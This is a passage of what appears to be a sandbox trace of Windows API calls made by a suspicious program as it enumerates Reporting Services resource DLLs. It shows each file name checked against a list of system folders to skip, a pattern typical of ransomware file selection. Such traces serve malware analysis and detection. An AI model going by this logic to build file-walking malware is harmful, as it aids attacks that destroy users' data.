lpString2="perflogs") returned -1 [0126.376] lstrcmpiW (lpString1="Microsoft.ReportingServices.QueryDesigners.Common.resources.dll", lpString2="documents and settings") returned 1 [0126.376] lstrcmpiW (lpString1="Microsoft.ReportingServices.QueryDesigners.Common.resources.dll", lpString2="$RECYCLE.BIN") returned 1 [0126.376] lstrcmpiW (lpString1="Microsoft.ReportingServices.QueryDesigners.Common.resources.dll", lpString2="system volume information") returned -1 [0126.376] lstrcmpiW (lpString1="Microsoft.ReportingServices.QueryDesigners.Common.resources.dll", lpString2="msocache") returned -1 [0126.376] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x2254c0 [0126.376] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.QueryDesigners.Common.resources.dll", cchWideChar=63, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 63 [0126.376] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dba8 [0126.376] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.QueryDesigners.Common.resources.dll", cchWideChar=63, lpMultiByteStr=0x20dba8, cbMultiByte=63, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.ReportingServices.QueryDesigners.Common.resources.dll", lpUsedDefaultChar=0x0) returned 63 [0126.376] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2254c0 | out: hHeap=0x1e0000) returned 1 [0126.376] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x2254c0 [0126.376] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.QueryDesigners.Common.resources.dll", cchWideChar=63, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 63 [0126.376] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dde8 [0126.376] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.QueryDesigners.Common.resources.dll", cchWideChar=63, lpMultiByteStr=0x20dde8, cbMultiByte=63, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.ReportingServices.QueryDesigners.Common.resources.dll", lpUsedDefaultChar=0x0) returned 63 [0126.377] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2254c0 | out: hHeap=0x1e0000) returned 1 [0126.377] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x130) returned 0x244708 [0126.377] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23e458 | out: hHeap=0x1e0000) returned 1 [0126.377] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dde8 | out: hHeap=0x1e0000) returned 1 [0126.377] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dba8 | out: hHeap=0x1e0000) returned 1 [0126.377] FindNextFileW (in: hFindFile=0x2320c0, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xfb86af90, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xfb86af90, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xfb86af90, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x71068, dwReserved0=0x60002, dwReserved1=0x236ace, cFileName="Microsoft.ReportingServices.QueryDesigners.resources.dll", cAlternateFileName="MI63FB~1.DLL")) returned 1 [0126.377] lstrcmpiW (lpString1="Microsoft.ReportingServices.QueryDesigners.resources.dll", lpString2=".") returned 1 [0126.377] lstrcmpiW (lpString1="Microsoft.ReportingServices.QueryDesigners.resources.dll", lpString2="..") returned 1 [0126.377] lstrcmpiW (lpString1="Microsoft.ReportingServices.QueryDesigners.resources.dll", lpString2="...") returned 1 [0126.377] lstrcmpiW (lpString1="Microsoft.ReportingServices.QueryDesigners.resources.dll", lpString2="windows") returned -1 [0126.377] lstrcmpiW (lpString1="Microsoft.ReportingServices.QueryDesigners.resources.dll", lpString2="recovery") returned -1 [0126.377] lstrcmpiW (lpString1="Microsoft.ReportingServices.QueryDesigners.resources.dll", lpString2="perflogs") returned -1 [0126.377] lstrcmpiW (lpString1="Microsoft.ReportingServices.QueryDesigners.resources.dll", lpString2="documents and settings") returned 1 [0126.377] lstrcmpiW (lpString1="Microsoft.ReportingServices.QueryDesigners.resources.dll", lpString2="$RECYCLE.BIN") returned 1 [0126.377] lstrcmpiW (lpString1="Microsoft.ReportingServices.QueryDesigners.resources.dll", lpString2="system volume information") returned -1 [0126.377] lstrcmpiW (lpString1="Microsoft.ReportingServices.QueryDesigners.resources.dll", lpString2="msocache") returned -1 [0126.377] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x225080 [0126.377] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.QueryDesigners.resources.dll", cchWideChar=56, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 56 [0126.377] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20d770 [0126.377] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.QueryDesigners.resources.dll", cchWideChar=56, lpMultiByteStr=0x20d770, cbMultiByte=56, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.ReportingServices.QueryDesigners.resources.dll", lpUsedDefaultChar=0x0) returned 56 [0126.377] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x225080 | out: hHeap=0x1e0000) returned 1 [0126.377] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x224aa8 [0126.377] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.QueryDesigners.resources.dll", cchWideChar=56, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 56 [0126.377] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20d920 [0126.377] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.QueryDesigners.resources.dll", cchWideChar=56, lpMultiByteStr=0x20d920, cbMultiByte=56, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.ReportingServices.QueryDesigners.resources.dll", lpUsedDefaultChar=0x0) returned 56 [0126.377] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x224aa8 | out: hHeap=0x1e0000) returned 1 [0126.377] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x120) returned 0x23f720 [0126.377] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x244708 | out: hHeap=0x1e0000) returned 1 [0126.377] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20d920 | out: hHeap=0x1e0000) returned 1 [0126.377] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20d770 | out: hHeap=0x1e0000) returned 1 [0126.377] FindNextFileW (in: hFindFile=0x2320c0, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x6b61d36, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x6b61d36, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x6b61d36, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x14ac8, dwReserved0=0x60002, dwReserved1=0x236ace, cFileName="Microsoft.ReportingServices.ReportDesign.Common.resources.dll", cAlternateFileName="MI5C38~1.DLL")) returned 1 [0126.377] lstrcmpiW (lpString1="Microsoft.ReportingServices.ReportDesign.Common.resources.dll", lpString2=".") returned 1 [0126.377] lstrcmpiW (lpString1="Microsoft.ReportingServices.ReportDesign.Common.resources.dll", lpString2="..") returned 1 [0126.377] lstrcmpiW (lpString1="Microsoft.ReportingServices.ReportDesign.Common.resources.dll", lpString2="...") returned 1 [0126.377] lstrcmpiW (lpString1="Microsoft.ReportingServices.ReportDesign.Common.resources.dll", lpString2="windows") returned -1 [0126.377] lstrcmpiW (lpString1="Microsoft.ReportingServices.ReportDesign.Common.resources.dll", lpString2="recovery") returned -1 [0126.377] lstrcmpiW (lpString1="Microsoft.ReportingServices.ReportDesign.Common.resources.dll", lpString2="perflogs") returned -1 [0126.378] lstrcmpiW (lpString1="Microsoft.ReportingServices.ReportDesign.Common.resources.dll", lpString2="documents and settings") returned 1 [0126.378] lstrcmpiW (lpString1="Microsoft.ReportingServices.ReportDesign.Common.resources.dll", lpString2="$RECYCLE.BIN") returned 1 [0126.378] lstrcmpiW (lpString1="Microsoft.ReportingServices.ReportDesign.Common.resources.dll", lpString2="system volume information") returned -1 [0126.378] lstrcmpiW (lpString1="Microsoft.ReportingServices.ReportDesign.Common.resources.dll", lpString2="msocache") returned -1 [0126.378] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x224bb8 [0126.378] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.ReportDesign.Common.resources.dll", cchWideChar=61, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 61 [0126.378] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20d698 [0126.378] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.ReportDesign.Common.resources.dll", cchWideChar=61, lpMultiByteStr=0x20d698, cbMultiByte=61, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.ReportingServices.ReportDesign.Common.resources.dll", lpUsedDefaultChar=0x0) returned 61 [0126.378] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x224bb8 | out: hHeap=0x1e0000) returned 1 [0126.378] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x2252a0 [0126.378] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.ReportDesign.Common.resources.dll", cchWideChar=61, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 61 [0126.378] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dde8 [0126.378] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.ReportDesign.Common.resources.dll", cchWideChar=61, lpMultiByteStr=0x20dde8, cbMultiByte=61, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.ReportingServices.ReportDesign.Common.resources.dll", lpUsedDefaultChar=0x0) returned 61 [0126.378] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2252a0 | out: hHeap=0x1e0000) returned 1 [0126.378] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x120) returned 0x23ecb8 [0126.378] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23f720 | out: hHeap=0x1e0000) returned 1 [0126.378] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dde8 | out: hHeap=0x1e0000) returned 1 [0126.378] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20d698 | out: hHeap=0x1e0000) returned 1 [0126.378] FindNextFileW (in: hFindFile=0x2320c0, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xfc2ff666, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xfc2ff666, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xfc2ff666, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0xaad0, dwReserved0=0x60002, dwReserved1=0x236ace, cFileName="Microsoft.ReportingServices.ReportDesign.Forms.resources.dll", cAlternateFileName="MI335D~1.DLL")) returned 1 [0126.378] lstrcmpiW (lpString1="Microsoft.ReportingServices.ReportDesign.Forms.resources.dll", lpString2=".") returned 1 [0126.378] lstrcmpiW (lpString1="Microsoft.ReportingServices.ReportDesign.Forms.resources.dll", lpString2="..") returned 1 [0126.378] lstrcmpiW (lpString1="Microsoft.ReportingServices.ReportDesign.Forms.resources.dll", lpString2="...") returned 1 [0126.378] lstrcmpiW (lpString1="Microsoft.ReportingServices.ReportDesign.Forms.resources.dll", lpString2="windows") returned -1 [0126.378] lstrcmpiW (lpString1="Microsoft.ReportingServices.ReportDesign.Forms.resources.dll", lpString2="recovery") returned -1 [0126.378] lstrcmpiW (lpString1="Microsoft.ReportingServices.ReportDesign.Forms.resources.dll", lpString2="perflogs") returned -1 [0126.378] lstrcmpiW (lpString1="Microsoft.ReportingServices.ReportDesign.Forms.resources.dll", lpString2="documents and settings") returned 1 [0126.378] lstrcmpiW (lpString1="Microsoft.ReportingServices.ReportDesign.Forms.resources.dll", lpString2="$RECYCLE.BIN") returned 1 [0126.378] lstrcmpiW (lpString1="Microsoft.ReportingServices.ReportDesign.Forms.resources.dll", lpString2="system volume information") returned -1 [0126.378] lstrcmpiW (lpString1="Microsoft.ReportingServices.ReportDesign.Forms.resources.dll", lpString2="msocache") returned -1 [0126.378] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x225768 [0126.378] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.ReportDesign.Forms.resources.dll", cchWideChar=60, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 60 [0126.378] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20d728 [0126.378] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.ReportDesign.Forms.resources.dll", cchWideChar=60, lpMultiByteStr=0x20d728, cbMultiByte=60, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.ReportingServices.ReportDesign.Forms.resources.dll", lpUsedDefaultChar=0x0) returned 60 [0126.378] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x225768 | out: hHeap=0x1e0000) returned 1 [0126.378] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x2254c0 [0126.378] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.ReportDesign.Forms.resources.dll", cchWideChar=60, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 60 [0126.378] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20d578 [0126.379] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.ReportDesign.Forms.resources.dll", cchWideChar=60, lpMultiByteStr=0x20d578, cbMultiByte=60, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.ReportingServices.ReportDesign.Forms.resources.dll", lpUsedDefaultChar=0x0) returned 60 [0126.379] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2254c0 | out: hHeap=0x1e0000) returned 1 [0126.379] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x120) returned 0x23ede0 [0126.379] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23ecb8 | out: hHeap=0x1e0000) returned 1 [0126.379] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20d578 | out: hHeap=0x1e0000) returned 1 [0126.379] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20d728 | out: hHeap=0x1e0000) returned 1 [0126.379] FindNextFileW (in: hFindFile=0x2320c0, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x863456d, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x863456d, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x863456d, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x4078, dwReserved0=0x60002, dwReserved1=0x236ace, cFileName="Microsoft.ReportingServices.RsClient.resources.dll", cAlternateFileName="MI5988~1.DLL")) returned 1 [0126.379] lstrcmpiW (lpString1="Microsoft.ReportingServices.RsClient.resources.dll", lpString2=".") returned 1 [0126.379] lstrcmpiW (lpString1="Microsoft.ReportingServices.RsClient.resources.dll", lpString2="..") returned 1 [0126.379] lstrcmpiW (lpString1="Microsoft.ReportingServices.RsClient.resources.dll", lpString2="...") returned 1 [0126.379] lstrcmpiW (lpString1="Microsoft.ReportingServices.RsClient.resources.dll", lpString2="windows") returned -1 [0126.379] lstrcmpiW (lpString1="Microsoft.ReportingServices.RsClient.resources.dll", lpString2="recovery") returned -1 [0126.379] lstrcmpiW (lpString1="Microsoft.ReportingServices.RsClient.resources.dll", lpString2="perflogs") returned -1 [0126.379] lstrcmpiW (lpString1="Microsoft.ReportingServices.RsClient.resources.dll", lpString2="documents and settings") returned 1 [0126.379] lstrcmpiW (lpString1="Microsoft.ReportingServices.RsClient.resources.dll", lpString2="$RECYCLE.BIN") returned 1 [0126.379] lstrcmpiW (lpString1="Microsoft.ReportingServices.RsClient.resources.dll", lpString2="system volume information") returned -1 [0126.379] lstrcmpiW (lpString1="Microsoft.ReportingServices.RsClient.resources.dll", lpString2="msocache") returned -1 [0126.379] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x2094b8 [0126.379] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.RsClient.resources.dll", cchWideChar=50, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 50 [0126.379] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20d698 [0126.379] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.RsClient.resources.dll", cchWideChar=50, lpMultiByteStr=0x20d698, cbMultiByte=50, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.ReportingServices.RsClient.resources.dll", lpUsedDefaultChar=0x0) returned 50 [0126.379] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2094b8 | out: hHeap=0x1e0000) returned 1 [0126.379] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x209710 [0126.379] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.RsClient.resources.dll", cchWideChar=50, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 50 [0126.379] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20d728 [0126.379] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.RsClient.resources.dll", cchWideChar=50, lpMultiByteStr=0x20d728, cbMultiByte=50, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.ReportingServices.RsClient.resources.dll", lpUsedDefaultChar=0x0) returned 50 [0126.379] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x209710 | out: hHeap=0x1e0000) returned 1 [0126.379] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x110) returned 0x23e7a0 [0126.379] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23ede0 | out: hHeap=0x1e0000) returned 1 [0126.379] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20d728 | out: hHeap=0x1e0000) returned 1 [0126.379] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20d698 | out: hHeap=0x1e0000) returned 1 [0126.379] FindNextFileW (in: hFindFile=0x2320c0, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xeff31e88, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xeff31e88, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xeff31e88, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0xa058, dwReserved0=0x60002, dwReserved1=0x236ace, cFileName="Microsoft.SqlServer.Types.resources.dll", cAlternateFileName="MICROS~1.DLL")) returned 1 [0126.379] lstrcmpiW (lpString1="Microsoft.SqlServer.Types.resources.dll", lpString2=".") returned 1 [0126.379] lstrcmpiW (lpString1="Microsoft.SqlServer.Types.resources.dll", lpString2="..") returned 1 [0126.379] lstrcmpiW (lpString1="Microsoft.SqlServer.Types.resources.dll", lpString2="...") returned 1 [0126.379] lstrcmpiW (lpString1="Microsoft.SqlServer.Types.resources.dll", lpString2="windows") returned -1 [0126.380] lstrcmpiW (lpString1="Microsoft.SqlServer.Types.resources.dll", lpString2="recovery") returned -1 [0126.380] lstrcmpiW (lpString1="Microsoft.SqlServer.Types.resources.dll", lpString2="perflogs") returned -1 [0126.380] lstrcmpiW (lpString1="Microsoft.SqlServer.Types.resources.dll", lpString2="documents and settings") returned 1 [0126.380] lstrcmpiW (lpString1="Microsoft.SqlServer.Types.resources.dll", lpString2="$RECYCLE.BIN") returned 1 [0126.380] lstrcmpiW (lpString1="Microsoft.SqlServer.Types.resources.dll", lpString2="system volume information") returned -1 [0126.380] lstrcmpiW (lpString1="Microsoft.SqlServer.Types.resources.dll", lpString2="msocache") returned -1 [0126.380] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c5e8 [0126.380] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.SqlServer.Types.resources.dll", cchWideChar=39, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 39 [0126.380] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0126.380] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.SqlServer.Types.resources.dll", cchWideChar=39, lpMultiByteStr=0x22cdc8, cbMultiByte=39, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.SqlServer.Types.resources.dll", lpUsedDefaultChar=0x0) returned 39 [0126.380] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c5e8 | out: hHeap=0x1e0000) returned 1 [0126.380] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c5e8 [0126.380] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.SqlServer.Types.resources.dll", cchWideChar=39, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 39 [0126.380] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 [0126.380] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.SqlServer.Types.resources.dll", cchWideChar=39, lpMultiByteStr=0x22d0d8, cbMultiByte=39, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.SqlServer.Types.resources.dll", lpUsedDefaultChar=0x0) returned 39 [0126.380] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c5e8 | out: hHeap=0x1e0000) returned 1 [0126.380] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x100) returned 0x1f19f0 [0126.380] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23e7a0 | out: hHeap=0x1e0000) returned 1 [0126.380] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0d8 | out: hHeap=0x1e0000) returned 1 [0126.380] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0126.380] FindNextFileW (in: hFindFile=0x2320c0, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf4646280, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf4646280, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf4646280, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x2e70, dwReserved0=0x60002, dwReserved1=0x236ace, cFileName="ReportingServicesNativeClient.resources.dll", cAlternateFileName="REPORT~1.DLL")) returned 1 [0126.380] lstrcmpiW (lpString1="ReportingServicesNativeClient.resources.dll", lpString2=".") returned 1 [0126.380] lstrcmpiW (lpString1="ReportingServicesNativeClient.resources.dll", lpString2="..") returned 1 [0126.380] lstrcmpiW (lpString1="ReportingServicesNativeClient.resources.dll", lpString2="...") returned 1 [0126.380] lstrcmpiW (lpString1="ReportingServicesNativeClient.resources.dll", lpString2="windows") returned -1 [0126.380] lstrcmpiW (lpString1="ReportingServicesNativeClient.resources.dll", lpString2="recovery") returned 1 [0126.380] lstrcmpiW (lpString1="ReportingServicesNativeClient.resources.dll", lpString2="perflogs") returned 1 [0126.380] lstrcmpiW (lpString1="ReportingServicesNativeClient.resources.dll", lpString2="documents and settings") returned 1 [0126.380] lstrcmpiW (lpString1="ReportingServicesNativeClient.resources.dll", lpString2="$RECYCLE.BIN") returned 1 [0126.380] lstrcmpiW (lpString1="ReportingServicesNativeClient.resources.dll", lpString2="system volume information") returned -1 [0126.380] lstrcmpiW (lpString1="ReportingServicesNativeClient.resources.dll", lpString2="msocache") returned 1 [0126.380] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x232fc0 [0126.380] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ReportingServicesNativeClient.resources.dll", cchWideChar=43, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 43 [0126.380] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 [0126.380] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ReportingServicesNativeClient.resources.dll", cchWideChar=43, lpMultiByteStr=0x22d0d8, cbMultiByte=43, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ReportingServicesNativeClient.resources.dll", lpUsedDefaultChar=0x0) returned 43 [0126.381] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x232fc0 | out: hHeap=0x1e0000) returned 1 [0126.381] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x233160 [0126.381] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ReportingServicesNativeClient.resources.dll", cchWideChar=43, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 43 [0126.381] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0126.381] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, 